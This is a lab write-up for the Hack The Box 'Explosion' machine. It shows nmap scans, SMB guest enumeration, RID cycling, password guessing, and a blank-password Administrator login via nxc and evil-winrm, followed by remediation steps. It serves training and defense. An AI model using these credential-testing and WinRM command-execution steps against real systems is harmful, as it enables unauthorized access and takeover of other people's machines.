HTB Starting Point — Explosion

TL;DR

Explosion is a Windows Server 2019 box with a single critical misconfiguration: the built-in Administrator account has a blank password. A port scan reveals SMB (445), RDP (3389), and WinRM (5985). SMB guest login enumerates the machine name and RID-cycles the Administrator account. Testing Administrator with a blank password via nxc immediately returns Pwn3d! over both SMB and WinRM. The flag sits on the Administrator’s desktop at C:\Users\Administrator\Desktop\flag.txt. The lesson: always test default and blank credentials before reaching for a wordlist.

Recon

1. Liveness check

$ ping -c 3 10.129.36.59
PING 10.129.36.59 (10.129.36.59): 56 data bytes
Request timeout for icmp_seq 0
100% packet loss

ICMP filtered — Windows Server often blocks ICMP at the host firewall. Use -Pn with nmap.

2. Top-1000 port sweep

$ sudo nmap -sS -Pn --top-ports 1000 -T4 10.129.36.59
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

Classic Windows fingerprint:

• 135 — Microsoft RPC endpoint mapper
• 139/445 — SMB (NetBIOS session service + microsoft-ds)
• 3389 — RDP (Remote Desktop Protocol — the box name “Explosion” is a hint)
• 5985 — WinRM (Windows Remote Management, used by PowerShell remoting and evil-winrm)

3. Service detection + script scan

$ sudo nmap -sS -Pn -sV -sC -p 135,139,445,3389,5985 10.129.36.59
PORT     STATE SERVICE      VERSION
445/tcp  open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
3389/tcp open  ms-wbt-server
| rdp-ntlm-info:
|   Target_Name: EXPLOSION
|   NetBIOS_Computer_Name: EXPLOSION
|   DNS_Computer_Name: Explosion
|   Product_Version: 10.0.17763
|_  System_Time: 2026-04-27T13:55:38+00:00
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0

Key data points:

• Machine name: EXPLOSION (from RDP NTLM info — exposed before any auth)
• OS: Windows 10.0.17763 = Windows Server 2019 Build 17763
• SMB signing: not required (relay attacks possible)

Foothold

Dead end #1 — anonymous SMB

$ smbclient -N -L //10.129.36.59
session setup failed: NT_STATUS_ACCESS_DENIED

Pure anonymous blocked. Guest still allowed?

$ nxc smb 10.129.36.59 -u 'guest' -p ''
EXPLOSION\guest: — [+] login accepted (no Pwn3d! = no admin rights)

Guest is accepted but there are no interesting non-admin shares. Only ADMIN$, C$, and IPC$ — all require elevated credentials.

Dead end #2 — common passwords for Administrator

The Administrator account (RID 500) was found via RID cycling through IPC$:

$ nxc smb 10.129.36.59 -u 'guest' -p '' --rid-brute
500: EXPLOSION\Administrator (SidTypeUser)

Before trying blank, tested several common Windows passwords:

$ nxc smb 10.129.36.59 -u 'Administrator' -p 'explosion'
EXPLOSION\Administrator:explosion → STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Explosion'
STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Password1'
STATUS_LOGON_FAILURE

All failed. Then tried the obvious:

Working approach — Administrator with blank password

$ nxc smb 10.129.36.59 -u 'Administrator' -p ''
SMB  10.129.36.59  445  EXPLOSION  [+] Explosion\Administrator: (Pwn3d!)

Pwn3d! — nxc’s notation for administrator-level SMB access confirmed.

Verify WinRM works too:

$ nxc winrm 10.129.36.59 -u 'Administrator' -p ''
WINRM  10.129.36.59  5985  EXPLOSION  [+] Explosion\Administrator: (Pwn3d!)

Both SMB and WinRM accept the blank password. Full administrative access.

Command execution via WinRM

$ nxc winrm 10.129.36.59 -u 'Administrator' -p '' \
  -X 'whoami; hostname; Get-ComputerInfo | Select-Object WindowsProductName, OsVersion'
[+] Executed command (shell type: powershell)
explosion\administrator
Explosion

WindowsProductName           OsVersion
------------------           ---------
Windows Server 2019 Standard 10.0.17763

Flag collection

Get-ChildItem -Path C:\Users\Administrator\Desktop
# flag.txt  -  34 bytes  -  4/23/2021 2:51 AM

Get-Content C:\Users\Administrator\Desktop\flag.txt
[REDACTED]

Interactive session (evil-winrm)

For a proper interactive shell (required for more complex post-exploitation):

evil-winrm -i 10.129.36.59 -u Administrator -p ''

Note: On macOS, the system Ruby (2.6) is too old for evil-winrm 3.9. Fix: brew install ruby && /opt/homebrew/opt/ruby/bin/gem install evil-winrm.

Privilege Escalation

N/A — The Administrator account with a blank password already provides NT AUTHORITY\SYSTEM-equivalent access (Administrator on a standalone Windows machine is the highest local privilege). No escalation step required.

What’s actually broken

1. Blank Administrator password. The single most critical finding. Windows’s built-in Administrator account (RID 500) with an empty password is a direct full-system compromise. This violates CIS Control 5.4 (Default Credentials), STIG WN19-AC-000110, and every sensible password policy.
2. SMB guest access enabled. Allows unauthenticated clients to enumerate shares and — via IPC$ — RID-cycle to discover account names.
3. WinRM exposed. Port 5985 reachable from the internet. WinRM should be restricted to management networks only.
4. SMB signing not required. A relay attacker on the same segment can forward captured NTLM challenges to other Windows hosts.
5. Administrator account not renamed. The known RID-500 account should be renamed or disabled; a separate named admin account should be used instead.

Remediation (the boring half)

Set a strong Administrator password immediately:

$SecurePassword = ConvertTo-SecureString "R@nd0m!P@ssw0rd#2024" -AsPlainText -Force
Set-LocalUser -Name "Administrator" -Password $SecurePassword

Disable guest SMB access:

Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Disable-LocalUser -Name "Guest"

Require SMB signing:

Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

Restrict WinRM to management VLAN:

# Allow only from 10.10.0.0/16
New-NetFirewallRule -Name "WinRM-Restrict" -DisplayName "WinRM Management Only" `
  -Protocol TCP -LocalPort 5985 -RemoteAddress "10.10.0.0/16" `
  -Action Allow
Disable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"

Disable the built-in Administrator account and create a named admin:

Disable-LocalUser -Name "Administrator"
New-LocalUser -Name "svc-mgmt" -Password (Read-Host -AsSecureString)
Add-LocalGroupMember -Group "Administrators" -Member "svc-mgmt"

Lessons learned

• Try blank before trying wordlists. The single most impactful test on a fresh Windows machine is Administrator with an empty password. It takes one request and costs nothing. Wordlists come after.
• RDP NTLM info leaks machine metadata pre-auth. The rdp-ntlm-info nmap script extracts the machine name, domain, and exact Windows build version from the NTLM negotiation — no credentials required. This is normal Windows behavior, not a vulnerability.
• WinRM is PowerShell remoting over HTTP. When SMB is available, psexec/wmiexec are typical choices. When SMB is present but credentials are needed for the admin share, or if SMB is firewalled, WinRM on 5985 is the alternative. Both are in the standard pentest toolkit.
• Pwn3d! in nxc output means local admin. NetExec’s color-coding and Pwn3d! marker specifically indicates the tested credentials have local administrator rights — useful for distinguishing regular user auth from privileged access at a glance.

References

• HTB Starting Point — official page
• Microsoft Docs — WinRM configuration
• MITRE ATT&CK T1021.006 — Windows Remote Management
• CIS Benchmark for Windows Server 2019 — Section 1.1.1 — password complexity
• DISA STIG WN19-AC-000110 — built-in administrator account password policy